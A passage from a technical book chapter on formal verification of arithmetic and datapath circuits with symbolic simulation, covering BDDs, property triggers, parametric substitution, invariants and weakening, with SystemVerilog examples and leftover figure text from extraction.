1986). Figure 7 contains an example of a sequence of symbolic computations
using BDDs. The great advantage of BDDs is that they provide a canonical
representation, i.e., each possible Boolean function over a set of variables has one
unique representation. In the downside, BDDs require a global ordering of variable
names, and the size of the representation can vary dramatically depending on the
variable ordering applied. Certain logic functions also simply do not have concise
representations as BDDs irrespective of the ordering, for example, arithmetic
multiplication (Bryant 1986).
As an alternative to BDDs, symbolic expressions are also frequently represented
using and-inverter graphs (AIGs) (Kuehlmann et al. 2002) or some similar data
structures (Bjesse and Boralv 2004) that typically allow a more concise representa-
tion at the expense of canonicity.
As a slight departure from tradition, to help theory development, we have chosen
the image set of symbolic Booleans in Definition 9 to be X, including the undefined
value X, instead of the more common B = {0, 1}. The symbolic Booleans in the
sense of Definition 9 can easily be implemented in terms of standard symbolic
Booleans, for example, with a dual-rail representation (Bryant and Seger 1990).
variables are associated with specific signals at specific times in the stimulus.
Associating a variable with a signal at a time effectively says that the value of the
signal at the time is either 0 or 1 (and not X) and that the actual value is not fixed,
but instead the symbolic variable is used to refer to what the value is.
Consider the symbolic stimulus and trace in Fig. 8 for the adder circuit of Fig. 3.
In addition to the 0, 1, and X values, the stimulus contains the 16 symbolic variables
a[7] . . . a[0] and b[7] . . . b[0]. In the simulation, the symbolic values propagate
alongside the 0, 1, and X values, and in each logic gate, they are combined with
each other to result in either a logical expression on the symbolic variables or a 0,
1, or X value.
For example, the symbolic variable a[0] is associated with signal datainB[1][0]
in simulation cycle 2, b[0] with datainB[2][0] and so on. Variable a[0] propagates
from signal datainB[1][0] in cycle 2 to datainC[1][0] in cycle 3 through a flip-flop,
then through datamskC[1][0] and to sumrawC[0], where it is combined with b[0]
to yield (a[0]&!b[0]+!a[0]&b[0]). This value propagates to sumC[0] in cycle 3 and
finally to output sumD[0] in cycle 4 through a flip-flop. Figure 9 depicts this path,
annotated with the signal values in the cycle relevant to each signal. In all other
simulation cycles, all signals in the picture have the value X, except for the constant
mskC[0].
The symbolic expressions for the result bus sumD in cycle 4 can be extracted
from the trace and compared to a reference model result computed by adding
together the two symbolic variable vectors {a[7] . . . a[0]} and {b[7] . . . b[0]}. Alter-
natively, the SVA correctness property add8ok of Fig. 4 can be included in the
0 1 2 3 4 5
aclk
avldB
stimulus
add8B
datainB[1][15:0] S {X,…,X,a[7],…,a[0]}
datainB[2][15:0] S {X,…,X,b[7],…,b[0]}
add8C
response
mskC[15:0] h00ff
avldD
sumD[15:0] S {0,…,0,…,a[0]&!b[0]+!a[0]&b[0]}
1
mskC[0]
symbolic simulation in Fig. 8, performing the addition of the input data values and
comparison to the result bus as a part of the property simulation in cycle 4.
The idea of symbolic simulation as a verification method starts from the
observation that the stimulus in Fig. 8 does not place any restrictions on inputs
besides the Boolean values on the control signals avldB and add8B in cycle 2. The
symbolic variables associated with the data bus datainB in cycle 2 of the stimulus
allow every possible value combination to occur, and in the other cycles, both
control and data inputs have the undefined value X. The start state of the simulation
is also unrestricted. In this way, the single symbolic trace represents every point of
every Boolean trace of the circuit that agrees on the fixed Boolean values on the two
control signals. Since the property add8ok holds in the symbolic trace, we conclude
that it holds at every point of every Boolean trace of the system, for all possible
input patterns. Just for the data, the symbolic simulation is doing the work of 216
traditional simulations, one for each possible assignment of 0/1 values to the 16
symbolic variables. This intuition is captured mathematically in Theorem 3 below.
Both Xs and symbolic variables in stimulus represent lack of information in that
they do not uniquely describe a value. However, their nature is different. The use
of X is an abstraction mechanism, while the use of symbolic variables is merely a
vehicle for doing the work of multiple concrete simulations in one simulation. A key
difference is illustrated in Fig. 10: Xs are pessimistic whereas symbolic values are
not. Also, there is only one X, whereas each symbolic variable refers to a specific
distinct Boolean value, although not to a fixed value. If an X is associated with
two different signals, there is no relation between the values of the signals. If the
same symbolic variable a is associated with two different signals, they are implicitly
restricted to have the same Boolean value, either both 0 or both 1.
In practical symbolic simulation, the size of the symbolic expressions flowing
in the wires during the simulation is the most crucial complexity metric and almost
always the limiting factor determining the applicability of the method, as simulation
with 0s and 1s is cheap and simulation with Xs is even cheaper. Later in this chapter,
we look at a host of techniques for managing this complexity.
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1287
X !a
X X a 0
X a
Fig. 10 Undefined value vs symbolic variable propagation
When symbolic values are expressed using BDDs, the comparison between
circuit and reference model results is trivial. For the two to agree, the expressions
computed by both must be identical because of canonicity.
When AIGs are used to represent symbolic values, the simulation needs to be
connected to an external SAT solver to determine the consistency between the circuit
and a reference model or the validity of a checker property. One way of looking at
the usage of AIGs instead of BDDs for the simulation is as a tradeoff of complexity
during simulation versus complexity after the simulation.
Definition 10. We define the concepts of symbolic state and symbolic trace; the
functions valid, ones, zeros, and char; the relations , B ; and related concepts
for symbolic traces as in Definitions 5, 6, 7 and 8, by replacing the set X with S, and
by replacing all references to circuit excitation and property functions and 0, 1, and
X with their symbolic lifts. Every (stimulus) trace T can be viewed as a symbolic
(stimulus) trace by replacing every 0, 1, and X in the image of T with their symbolic
lifts.
1288 R. Kaivola and J. O’Leary
Definition 11. We say that a symbolic stimulus trace T is universal if for every
Boolean stimulus trace T such that T B T , there exists a ∈ VA such that
inst(a)(T ) T .
Practical Considerations
fixed-point computation takes place in the symbolic simulation, and the property is
verified relative to one single fixed time point of the symbolic trace. As the fixed-
point computation is the expensive part of model checking, this latter aspect sets
the two methods far apart regarding computational complexity. Of course, it also
restricts what can be verified.
The practice of formal verification with symbolic simulation is also very different
from common model checking. The former is at heart an interactive computer-aided
verification method guided by human intuition about the circuit under verification.
The latter strives to be a fully automated approach that still in reality requires careful
human intervention in the ways the tool is invoked to guide it past complexity
bottlenecks.
While a successful verification of a property with symbolic simulation always
guarantees its validity, the inverse is not true. The validation of a property often
fails just because some signal values it refers to are Xs in the simulation: Without
knowing what the values are, the validity of the property cannot be determined.
A large part of the human verification effort goes to root-causing these Xs and
strengthening the stimulus by associating symbolic variables with more signals.
From user perspective, verification of a property by focusing on a single instance
of it in symbolic simulation is somewhat analogous to looking at a single instance
of a property in bounded model checking (BMC). In both cases, there is a fixed-
length sequence from a start state, on which the property either holds or is violated.
One difference is that in BMC, the start state is initialized, whereas in symbolic
simulation, it is unrestricted. Also, in BMC, the sequence is represented by a series
of unrolled next-state relations, whereas in symbolic simulation, the effects of the
circuit computation are gradually accumulated into the expressions flowing in the
wires in the simulation. Considering the unrestricted start state, symbolic simulation
is conceptually similar to an extreme case of k-induction, for the case k = 0.
However, the usage models of the two methods are quite disparate, one stressing
automation and the other user guidance, and it is unclear what practical implications
could be drawn from parallels between them.
Property Triggers
where the individual triggers trig i and verification goals goal i are fixed time
window properties. Of course, every fixed time window invariant can be trivially
expressed in this form by leaving the trigger empty and having the given property
as the single goal. However, the efficiency of the method is highly dependent on
1290 R. Kaivola and J. O’Leary
the triggering conditions restricting both the scope of circuit logic that needs to be
simulated and the size of the expressions in the simulation. If symbolic variables are
associated with all inputs in the stimulus without any triggering conditions, all the
simulation does is to copy the circuit logic syntactically into the expressions flowing
in the wires.
Consider the 8-bit adder example of Fig. 3 and the propagation of values in the
pipeline with the stimulus in Fig. 8. Corresponding to the triggers avldB and add8B
of the property add8ok in Fig. 4, the stimulus sets the values of these signals to 1 at
cycle 2. In the simulation, due to the values propagating in the pipeline, the signal
add8C has value 1 in cycle 3. This value 1 is used to compute the mask vector
mskC leading to the high bytes of datainC being zeroed in datamskC before the
addition takes place in signal sumrawC. Now, when adder logic is simulated, only
8-bit symbolic addition needs to be computed, even though the circuit contains logic
for 16-bit addition.
The discussion above glossed over the detail of how the triggers of the property
add8ok in Fig. 4 became the fixed values for avldB and add8B in cycle 2 in the
stimulus of Fig. 8. It is not difficult to imagine an algorithm, though, that would
derive such fixed values from the triggers of a given property and a user-supplied
reference cycle for checking its goals, in this instance the property add8ok and
cycle 4. The question is more general, however. In the add8ok example, the triggers
are particularly simple and directly correspond to fixed Boolean stimulus values.
This is generally not the case, and individual trigger conditions may be satisfied by
multiple alternative value assignments. Yet, it is important to restrict the scope of
the simulation only to the cases where the triggers are satisfied. Any other cases do
not matter for the verification goals, and incurring the cost of simulating such cases
is effort wasted.
To illustrate this issue, let us introduce another execution unit mul for multi-
plication and combine the adder and multiplier to a simple ALU with different
latencies, two cycles for add and three cycles for mul, as in Figs. 11, 12, and 13.
The ALU circuit contains powerup logic for the subunits, decoding the operation
code opA, and optional power-saving logic that turns on the clock to a subunit only
when there is an operation going through it. Each subunit powers up for five cycles
when needed. A reset signal rst turns on the clocks and clears the valid signals going
through the units. A high power mode switch PWRHI overrides the power-saving
logic and forces clocks to both subunits to toggle freely. For the moment being,
assume the PWRHI override to be 1.
The 8-bit adder correctness property can be moved to the ALU level as in Fig. 14.
In the context of the ALU circuit, however, it is not sufficient to assert just the
valid signal and the operation control for the ADD8 operation, as the presence of
the three-cycle MUL creates a pipeline hazard. For the addition operation to work,
there cannot be a MUL operation starting a cycle earlier. This requirement can be
incorporated into the correctness property as a third trigger as in Fig. 15.
Consider then the verification of the property alu8okB of Fig. 15, with focus on
cycle 4 for checking the goal of the property. Informally this could be done by
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1291
add
vldA
opA avldB avldD
datainB + sumD wbW
aclk
clk
pipestage A B C D W
mul
mvldB
mvldE
pp prd prdE
mclk
pipestage A B C D E
‘FF( mvldC, mvldB, mclk ); ‘FF( datainC, datainB, mclk ); // flop pipestage B->C
always_comb for (i=0;i<16;i=i+1) // partial products
ppC[i]=(datainC[1]<<i)&{16{datainC[2][i]}};
‘FF( mvldD, mvldC, mclk ); ‘FF( ppD, ppC, mclk ); // flop pipestage C->D
always_comb begin
prdD=16’b0;for (i=0;i<16;i=i+1) prdD=prdD+ppD[i];end // sum partial products
‘FF( mvldE, mvldD, mclk ); ‘FF( prdE, prdD, mclk ); // flop pipestage D->E
endmodule
simulating an ADD8 operation that starts in pipestage A in cycle 1 and writes back
the result in cycle 4. The first and second triggers of alu8okB correspond naturally
to fixed values vldA = 1 and opA = ADD8 = 01 in cycle 1. The third trigger
can be satisfied in two ways: either when vldA = 1 or when opA = MU L = 11
in cycle 0. It can be seen informally from the circuit logic in Fig. 16 that under this
restriction the internal signal mvldA is equal to 0 in cycle 0, and the value propagates
to mvldE in cycle 4, allowing the ADD8 result through the write-back mux and
ignoring any value coming from the multiplier. However, there is no fixed value
assignment that would match the third trigger. Some assignment could be picked,
but that would ignore the other ways of satisfying the trigger. Iterating over all
possible assignments that make the trigger true could be considered, but in general,
the number of such assignments is exponential in the number of bits involved. An
optimal solution would be to symbolically simulate all cases where the trigger is
satisfied, and only those, in a single simulation. The next subsection focuses on
techniques enabling precisely that.
1292 R. Kaivola and J. O’Leary
parameter NOP = 2’b00, ADD8 = 2’b01, ADD16 = 2’b10, MUL = 2’b11, PWRHI = 1’b1;
module alu( input rst, clk, vldA, [1:0] opA, [15:0] datainB [2:1],
output reg vldW, reg [15:0] wbW );
bit aclk, avldA, add8A, avldB, add8B, avldD, mclk, mvldA, mvldB, mvldE;
bit [15:0] sumD, prdE; bit [4:0] avldN, mvldN;
add add( aclk, avldB, add8B, datainB, avldD, sumD ); // add, pipestages B->C->D
mul mul( mclk, mvldB, datainB, mvldE, prdE ); // mul, pipestages B->C->D->E
property alu8okB;
@(posedge clk)
( $past(vldA,3) &&
( $past(opA,3)==ADD8 ) &&
˜( $past(vldA,4) && ($past(opA,4)==MUL) )
) |->
( wbW[7:0] == $past(datainB[1][7:0],2) + $past(datainB[2][7:0],2) )
endproperty
vldA
opA[1]
opA[0]
mvldA
rst mvldB mvldC mvldD mvldE
1. Simulate the triggers on stimulus which associates symbolic variables with all
signals and times the triggers refer to.
2. Compute parametric substitution from the trigger expressions from step 1.
3. Apply the substitution from step 2 to the stimulus and simulate the property
goals.
stimulus
vldA v0 v1
opA[1:0] c0[1:0] c1[1:0]
$past(*,3) t=4
$past(*,4)
0 1 2 3 4 5
clk
v0 & (!c0[0]+!c0[1])
rst
vldA S
stimulus
opA[1:0] c0[1:0] 01
datainB[1][15:0] S {X,…,X,a[7],…,a[0]}
datainB[2][15:0] S {X,…,X,b[7],…,b[0]}
mvldA ADD8
instance
response
mvldE verified
avldA S
avldD S
wbW[15:0] S {0,…,0,…,a[0]&!b[0]+!a[0]&b[0]}
The three target expressions of the substitutions refer to the three variables v0 , c0 [1],
and c0 [1]. The values of these three expressions for the eight possible Boolean
assignments for the variables cover every combination except 1-1-1, i.e., the exact
set of assignments that makes ¬(v0 ∧ c0 [1] ∧ c0 [0]) true.
At step 3 in the parametric substitution process, the substitutions are applied to
the stimulus of Fig. 17, resulting in the stimulus in Fig. 18. Independent symbolic
variables are added for the data bus, and finally the goal of the property alu8okB
of Fig. 15 is simulated. The resulting simulation covers now exactly the cases
where the trigger conditions hold. With the stimulus of Fig. 18, the computation of
mvldA in cycle 0 occurs as in Fig. 19, resulting in the value 0. When parametric
substitutions are used in a BDD-based simulation, such internal simplifications
happen automatically, due to the canonicity of BDDs.
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1295
v0 &
v0 & (!c0[0]+!c0[1]) (!c0[0]+!c0[1]) &
vldA
c0[0] & c0[1]
opA[1]
c0[1]
c0[0]&c0[1] Æ 0 0 0 0 0
opA[0]
c0[0]
0 mvldA
rst mvldB mvldC mvldD mvldE
cycle 0 1 2 3 4
Fig. 19 Internal simplification
If AIGs are used for logical expressions instead of BDDs, it is still advantageous
to derive all the constant signal assignments from the triggers, as they help to
simplify circuit logic. The rest of the parametric substitution method, on the other
hand, is not useful with AIGs. Instead, internal simplifications need to be explicitly
enabled in the simulator, for example, by speculative SAT calls checking whether
the expression for an internal signal in the simulation is equivalent to a Boolean 0
or 1 under the trigger conditions. The limiting factor in this respect is the number
of circuit signals in the simulation, which means that the time that can be spent on
simplification per signal is very short, or the user must be able to judiciously guide
the tool to attempt simplification only on certain signals.
The usual default strategy is to attempt to maximize internal simplifications
because of the resulting reduction in simulation scope. This also helps goal check-
ing: if the simulation is done using BDDs and all triggers are used for parametric
substitutions, it is sufficient to just check that all goals evaluate to 1s in the
simulation. However, there are cases when the cost of computing the simplifications,
especially the cost of computing the parametric substitutions, exceeds the savings
it has provided. In these cases, it may be better not to use some of the triggers for
simplification. Instead, they need to be factored in when checking the validity of the
verification goals after the simulation. If the simulation is done using non-canonical
symbolic representations with a SAT call in the end, all triggers are be used as
assumptions for the goal checking already by default. When simulation is done
using BDDs, however, extra post-simulation work is needed to check whether the
symbolic expression for the triggers imply the symbolic expressions for the goals.
A methodology and a tool called Conjver to address this question while avoiding
prohibitive BDD growth is discussed in Kaivola (2005).
Reachable-State Invariants
The example circuits so far have not required any initialization. They can be brought
up in an arbitrary state and still work correctly. For verification based on symbolic
simulation, this is the optimal scenario, matching the maximally unrestricted start
1296 R. Kaivola and J. O’Leary
state of the simulation. Reset-free circuits are, of course, an anomaly, and most
circuits require initialization to bring them to an internally consistent state to
guarantee correct behavior. In traditional model checking, the initialization and
reachable-state analysis automatically guarantees that only circuit states satisfying
such basic consistency are considered, although there is a computational cost for
this analysis. In verification by symbolic simulation, on the other hand, accounting
for such internal circuit consistency requires human effort. It is done through the
manual formulation of consistency invariants and the explicit addition of them to
the set of triggers in a simulation.
Consider now the ALU circuit in Fig. 13 with the low power mode enabled,
i.e., the parameter PWRHI defined as 0. In this circuit, the triggers of the adder
correctness property alu8okB in Fig. 15 no longer guarantee correct 8-bit adder
behavior in a simulation started from an arbitrary state without reset. If the circuit is
powered up in a state where mvldE is high and no reset happens, mvldE continues to
stay high until the first MUL operation occurs, because the clock to the mul subunit
does not toggle. During this time, mvldE corrupts every ADD result at the result
write-back mux. This does not happen in initialized traces, since reset clears mvldE,
and it is only going to be set again when there is a valid MUL operation finishing
its pipeline, and reset afterwards. Expressed as an internal consistency invariant, the
property mvldEok in Fig. 20 is missing, even though it is universally valid in every
initialized trace of the circuit.
The property alu8okB can be augmented by adding an instance of the invariant
mvldEok to the triggers as in Fig. 21. By Boolean simplification, for example, by
parametric substitutions, the triggers together then imply that mvldE is 0 in cycle 4,
which allows the addition result to flow through the result mux exactly as in Fig. 18.
Just considering the simulation, there is no difference between the new trigger
and the previous ones. They are all assumptions restricting the scope of the claim
under verification. However, methodologically, the different triggers have distinct
roles:
property mvldEok;
@(posedge clk)
( mvldE = ( $past(vldA,4) && ( $past(opA,4) == MUL ) ) )
endproperty
assert property(mvldEok);
property alu8okC;
@(posedge clk)
( $past(vldA,3) &&
( $past(opA,3)==ADD8 ) &&
˜( $past(vldA,4) && ($past(opA,4)==MUL) ) &&
( mvldE = ( $past(vldA,4) && ($past(opA,4)==MUL) ) )
) |->
( wbW[7:0] == $past(datainB[1][7:0],2) + $past(datainB[2][7:0],2) )
endproperty
– The first and second triggers are inherent to the property being verified: if ADD8
operation is executed, then result is correct for ADD8.
– The third trigger is an instance of an external assumption, reflecting an expecta-
tion that MUL and ADD8 operations should not execute in patterns that would
lead to pipeline hazards.
– The last trigger is an instance of an internal invariant that is expected to be
universally true in every initialized trace of the circuit.
An implicit expectation is that the latter two triggers are universally true in the
normal operating circumstances of the circuit whenever the basic triggers are true
and, therefore, do not really constitute restrictions to the scope of the verification.
This classification of simulation triggers to basic triggers, external assumptions,
and internal invariants is ubiquitous in verification based on symbolic simulation, as
is the belief that the latter two classes are just auxiliary helpers that do not restrict
what is “really” verified. In other words, the verification of the property alu8okC
of Fig. 21 is expected to imply the original property alu8ok of Fig. 14, with only
the first two triggers. The validity of this expectation naturally depends on whether
the purported invariants are truly invariants. For internal invariants, the best practice
is to formally verify them by means of a traditional model checker. The validity
of the external assumptions is usually outside the scope of a formal effort and is
often done by including the assumptions as simulation checkers in a traditional test
environment.
There is a human cost to identify and formulate the internal invariants which
over-approximate the reachable-state space of the system to the extent that is
necessary to enable the verification of the main validity goals, as well as to
determine the exact times at which these invariants should be instantiated as triggers
in the symbolic simulation task. There is also a computational cost in the validation
of these invariants through external means. The tradeoff of these costs is that they
obviate the cost of computing the reachable-state fixed point that traditional model
checking would need, enabling the method to handle substantially larger systems.
The number and type of internal invariants needed depends on the type of the design
and the property to be verified; however, in general, the cost tends to increase with
the number of feedback loops present in the circuit. For many straight pipeline
designs, most internal invariants needed are akin to the mvldEok invariant in Fig. 20
above, relating internal control signals to events at the circuit interface.
Complexity Management
Simulation Complexity
Complexity Analysis
The limits of computational capacity are the limits between what can and what
cannot be verified in practice. When attempting to resolve a computational capacity
challenge, the most crucial difference between symbolic simulation and traditional
model checking is that in symbolic simulation, a computational capacity problem
is virtually always extremely concrete. It manifests itself as a symbolic expression
that is too large, an expression that is associated with a particular node and time
in the simulation. This concreteness allows a human user to analyze, understand,
and resolve the problem with a degree of precision that is simply not available in
any other verification method that the authors are aware of. This amenability to
precise performance analysis is one of the key differentiators enabling the success
of symbolic simulation as a verification method.
Performance analysis is further assisted by the fact that the verification focuses
on exactly one instance of the property under verification in a symbolic trace. Not
only does a performance problem actualize in some specific signal at a specific time,
but the human verifier can also understand the role of that signal and time relative to
the property and the pipeline. Returning to the ADD8 example, consider the ADD8
operation in the ALU circuit in Figs. 11 and 13, which includes the mul unit. If
the user attempts to simulate using the triggers in Fig. 21, the simulation may not
be completed successfully because the symbolic expressions generated during its
process grow too large. Assuming that the simulator has an ability to fail gracefully,
the user could then locate sample signals and times at which the large symbolic
expressions occur and find out that they are in the mul sub-circuit. Based on the
user’s knowledge about the circuit and the property, it could then be concluded that
this computation is simply unnecessary for the verification goal. The techniques to
guide the simulator to avoid such computations are discussed below.
The symbolic expressions flowing in the simulation are based on the symbolic
variables associated with specific signals and times in the stimulus. These variable
dependencies also help the user to understand what the circuit is attempting to
compute when there is a problem in the computation. For example, while for ADD8
the symbolic expressions related to the bit-vector addition are small enough that
practically any symbolic representation is able to handle them, for ADD16, this
is no longer the case, and a good variable ordering is a must for a succinct BDD
representation. If this fact had not been discovered yet, and an ADD16 simulation
was attempted, prohibitively large expressions would occur in the adder datapath.
This scenario is different from the expression grown in the MUL signals above, as
now the problem signals are in the datapath for the operation under verification,
and they need to be computed to carry out the verification. Looking closer at
the expressions, the user would find out that they depend on symbolic variables
associated with the input data and that the expression size grows rapidly when
going from lower to higher bits in the datapath. This would lead the user to look
at the operation the data path is intended to compute, addition, and draw the lesson
from general knowledge about BDD behavior that the input data bits should be
interleaved in the variable ordering.
1300 R. Kaivola and J. O’Leary
The expression size and variable dependency analysis is not only a feature of
BDD-based simulation. The authors have found these techniques extremely useful
also when the simulation is done with AIGs and the verification goal checking
is done using SAT. In practice, there appears a strong correlation between the
SAT solver performance and the size of the simulation expressions used as its
inputs. This allows the user to identify signals with large expressions, trace the
variable dependencies, and determine to what extent the expressions are expected to
contribute to the property under verification.
Weakening
The techniques for guiding the simulator to discard or not compute values for certain
signals and times during the simulation are collectively called weakening. There are
three main types of weakening:
1. Universal weakening
2. Cycle-specific weakening
3. Dynamic weakening
All these share the basic idea that at certain points in the simulation, the simulator
should replace a value it would otherwise compute with the undefined value X.
Since the value X abstracts any value, weakening is safe in the sense that any
property that is true over the weakened trace would also be true of the trace that
would be computed without the weakening. The inverse is not true: The failure of a
property over a weakened trace may be caused by the weakening itself and does not
necessarily mean that the property is not valid.
In universal weakening, the user instructs the simulator to discard the values for a
certain set of signals across all times in the simulation and replace them with Xs. It
is equivalent to the concepts of “free” or “stop-at” present in many model checkers.
Effectively the fan-in logic for a weakened signal is discarded, and it becomes a new,
unrestricted input to the system. The behaviors of the weakened system naturally
over-approximate the original system. For example, in the ADD8 example in the
ALU circuit of Fig. 13, with the mul subunit, the input data signals to the mul subunit
could be universally weakened to prevent expression growth there.
Cycle-specific weakening is a more fine-grained version of universal weakening.
It allows the user to discard the values for a given set of signals, but instead of all
times only for a certain cycle or cycles, like a cycle-specific stop-at directive. This
technique is unique to symbolic simulation. The fact that it is even meaningful to
talk about signals at specific times in the verification task is directly related to the
fact that symbolic simulation focuses on just one fixed instance of the verification
goal.
For example, consider again the ADD8 operation in the ALU circuit in Figs. 11
and 13, and assume that the circuit is augmented with a bypass loop back from the
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1301
result to the inputs. When simulating the result write-back cycle, the addition result
on its way to the circuit output also loops back to the unit inputs through the bypass,
causing possible symbolic expression growth both in ADD and MUL. The issue
with the MUL can be resolved as above, by universally weakening its data inputs.
However, ADD inputs cannot be universally weakened, as the data for the ADD8
operation flows through these signals two cycles earlier. What can be done instead
is to weaken these signals at all other cycles than the one needed by the wave of data
for the ADD8 operation.
Cycle-specific weakening is an extremely versatile technique that allows the
users to apply their intuition about the usage of signals at times relative to the
progress of the operation under verification in the reduction of the simulation cost. A
common usage model is to weaken a signal at a time and simultaneously associate
a fresh symbolic variable with it in the stimulus. Various algorithmic techniques
to automatically compute cycle-specific weakening sets based on the verification
goals, the circuit, and user intuition about the design intent are also frequently
applied.
The third technique, dynamic weakening, is based on looking at expressions as
they are computed in the simulation instead of the criteria fixed beforehand. In
its most basic form, the user can instruct the simulator to discard any symbolic
value and replace it with an X if the expression size for the value exceeds a user-
given threshold. In more advanced forms, the user can apply more fine-grained
thresholds that may depend on the simulation cycle, the signal name or hierarchy, or
the presence or absence of certain symbolic variables in the expression. Dynamic
weakening is a very robust technique that in many instances allows the user
to quickly resolve complexity issues caused by the computation of unnecessary
expressions in the simulation, without the need of more detailed analysis. Dynamic
weakening works especially well when there is a reasonable upper bound on the
sizes of the expressions needed for the verification goal. For example, in ADD8
verification in the ALU circuit, all the issues with expression growth in the mul
subunit or through the bypass could be resolved by setting a simple dynamic
weakening limit just above the relatively small expression size needed by the adder.
The concreteness of symbolic simulation gives the verification engineer fine-
grained visibility into the computations on the level of individual signals, enabling
precise analysis and mitigation of computational complexity bottlenecks through
weakening. However, the determination of which signals at which simulation times
are really needed for a specific verification goal is often a time-consuming task.
In many cases this task can be automated by the technique of timed causal fanin
analysis (Kaivola and Bar Kama 2022). This method is based on the use of
information from a preliminary, more approximate, symbolic simulation run done
with a low dynamic weakening threshold, to compute a tight fanin cone of interest
for the verification goals, weakening all other circuit logic in the main symbolic
simulation run. The method combines the principles of cone-of-influence (COI)
reduction and constant-based model reduction on a cycle-by-cycle basis.
1302 R. Kaivola and J. O’Leary
Verification Flow
0 1 2 3 4 5 6 7 8 9
clk
rst
vldA
stimulus
opA[1:0] 00 01 00
datainB[1][15:0] S {X,…,X,a[7],…,a[0]}
datainB[2][15:0] S {X,…,X,b[7],…,b[0]}
mvldA
response
mvldE
avldA
avldD
wbW[15:0] S {0,…,0,…,a[0]&!b[0]+!a[0]&b[0]}
more conventional formal tools. However, there are essential differences. First, in
symbolic simulation, the variable names occurring in expressions give direct insight
into the flow of values in the simulation. Second, environment assumptions are not
automatically included in symbolic simulation and must be explicitly added to the
triggers of the simulation by the user to take effect. Environment assumptions are not
automatically instantiated in symbolic simulation, since they can be a major source
of computational complexity, alongside circuit scope, and user control is essential
in controlling and containing this complexity.
Once stimulus for a successful simulation in an overconstrained environment
has been constructed, the overconstraints are gradually removed and replaced by
reachable-state restrictions reflecting the expected real operating environment of the
design. For example, in verification of the alu8ok property in Fig. 14, the user might
first remove the restriction that vldA is asserted just once, allowing other possibly
interfering operations to take place. If only the original two triggers of alu8ok
are present, in this first step, the user would observe an undefined X value in the
result write-back bus, trace it through the result write-back mux to a control signal
coming from the multiplier, realize that a scheduling constraint between the MUL’s
and ADD’s is needed for proper behavior, and either instantiate a property already
present in the model in the trigger or formulate the needed scheduling constraint
and then instantiate it, as in property alu8okB in Fig. 15. In the second step, the
user would remove the initial reset and enable the low power mode, leading to a
fully general stimulus. In this stage, the user would notice the need for an internal
invariant between the mvldE signal and the interface control signals as in Fig. 20
and add the invariant to the trigger, as in property alu8okC of Fig. 21.
1304 R. Kaivola and J. O’Leary
The simulation X values are a powerful means for detecting design bugs caused
by unintentional interferences. In the example system, the X values could be root-
caused to missing external or internal invariants. Equally well, the debug process
could lead to an observation that the result of an operation can be corrupted by
another simultaneously executing operation, a design bug. The strengthening of the
stimulus and the trigger primarily takes place through identification of restrictions
that are strong enough to narrow the set of behaviors to exclude the problematic
propagation of values while being weak enough that the verifier still expects them
to hold in all properly initialized states. Human insight is needed in the loop to
identify and articulate the reachable-state invariants. The verification done by the
simulation is, of course, only as strong as these restrictions, and therefore, it is
important that they are well validated, for example, by including the restrictions
as run-time checkers in the dynamic simulation environment for the design or by
verifying the internal invariants by other formal means.
Arithmetic Circuits
Direct Verification
would look like and how a particular variable ordering would affect it. In practice,
most BDDs tend to be too large to be intuitively grasped by just visualizing them
as graphs. Instead, the authors have found it a useful conceptual tool to consider
the BDD as a machine that reads an assignment of values to the symbolic variables
in a linear sequence according to the variable ordering and produces the result of
the function for that assignment. After having read the assignments to the first n
symbolic variables, the machine must retain enough information about the values
already read to properly compute the function for all possible assignments to the
symbolic variables not yet read. The less information that needs to be retained about
the values already read, the more concisely the machine can be represented as a
BDD. Although this conceptual analysis is imprecise, it often allows us to estimate
the magnitudes of different BDD presentations effectively.
For example, consider the equality comparison a = b between two sym-
bolic vectors a[n : 0] and b[n : 0]. Assume first that the variable ordering is
a[n], . . . , a[0], b[n], . . . , b[0], placing all variables in vector a above vector b.
Consider the state of the “BDD machine” computing a = b after reading the
assignment for all the bits a[n : 0] but none of the bits b[n : 0] yet. At this point,
the machine must remember the value for each a[i] in order to compare it to b[i],
yet to be read, i.e., it must have at least 2n different states, implying that the size of
the BDD representation for a = b is exponential in n.
Assume then that the variable ordering is interleaved as in a[n], b[n], . . . , a[0],
b[0]. Consider the ‘BDD machine’ computing a = b, and the state of the
machine after reading the assignment for variables a[n], b[n], . . . , a[i], b[i] for any
i. At this point, the machine only needs to be distinguish two scenarios: either
a[n : i] = b[n : i], i.e., a and b agree for all bits above i, or they don’t. In the
first case, it is possible that a = b and the remaining bits need to be read to see if
this is actually true, and in the second case, it is already known that a = b is not
true. As for any i, only two states need to be distinguished, the BDD representation
of a = b is linear in the number of bits n.
For large classes of operations, good variable orderings are already known from
previous experience. For example, for most bit-vector operations, comparisons and
addition and subtraction type operations, a good ordering interleaves the symbolic
data bits from the different inputs, starting from the most significant bit and ending
with the lowest. For operations that use one input as a pointer to manipulate another
input, such as logical and arithmetic shifts, rotates, and selects, a good ordering
places the pointer input symbolic bits above the bits for the input that is manipulated.
The BDD complexity of an operation and the effects of different variable
orderings are best analyzed using the abstract specification of the operation, not
an implementation. This allows the user more freedom to experiment, compute the
results step by step, and pinpoint the specific stage where adverse expression growth
may happen. The authors’ empirical observation has been that a variable ordering
that is good for an abstract specification is almost universally also good for any of
its implementations.
1306 R. Kaivola and J. O’Leary
Floating-Point Operations
– Compute precise, unrounded result on the basis of the inputs. In theory this
would be the infinitely precise result; However, in practice, a sufficiently precise
approximation is enough.
– Normalize the unrounded result.
– Round the normalized result.
In a hardware implementation, the stages may not have clear boundaries. In the
authors’ experience, for most operations, the exponent datapaths computing the
unrounded result tend to have only calculations that have manageable BDD behavior
such as additions, subtractions, shifts, and so on. Where symbolic complexity
problems exist, they are almost always in the mantissa datapath. The normalization
stage can be expensive to compute symbolically, and where possible, it is helpful to
limit the width of normalization shifts by context-specific information, for example,
by knowledge of any bounds that the unrounded mantissa is known to obey. The
final stage, rounding, tends to be easy to compute symbolically, although rounding
specifications can be tricky to write.
Most unary floating-point operations can be directly verified with symbolic
simulation, including, for example, normalization and denormalization, rounding,
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1307
Floating-Point Addition
The solution to this problem pulls together three distinct ingredients. First, since
mantissa addition does not need to be done at all when the exponent differences are
either too large or too small, mantissa addition matters only for a small finite set
of distinct exponent differences. This set can be exhaustively iterated over with a
case split, and each exponent difference can be considered separately. Second, for
each such fixed exponent difference, there is a good variable ordering, aligning the
symbolic variables for the input mantissas according to their position in the addition
